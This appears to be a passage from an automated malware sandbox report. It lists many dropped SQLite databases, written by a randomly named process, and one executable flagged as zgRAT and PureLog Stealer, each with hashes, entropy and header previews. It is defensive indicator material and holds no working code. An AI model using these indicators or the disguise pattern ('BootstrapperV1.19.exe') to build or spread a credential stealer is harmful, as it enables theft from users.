                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\BootstrapperV1.19.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):2241785
                                                    Entropy (8bit):7.473760853524297
                                                    Encrypted:false
                                                    SSDEEP:24576:2TbBv5rUyXVahNXfa1eVzqP3FsO+F8obr53uRdZvAADFrO0mtbnD6d5xknbg5bUn:IBJa+U5kzXDFrO0iTb0bzveEX99k
                                                    MD5:B444FEC863C995EC2C4810FC308F08C2
                                                    SHA1:F8F8CB40DAF8054A00FB7B3895BABD68C6429161
                                                    SHA-256:E7CCCBE17462FBA64687EDDC141D99920AC3E890ED1464D17B6110FDCA6BE7DE
                                                    SHA-512:1472D2A9E95C949A67734AF6849F827122A178DF799C7C29252CC0221437FB8573BCFF0A30E8F1D0E6AB1C39C8FE72C597F863BC192133A10CD6178BECC17127
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 55%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
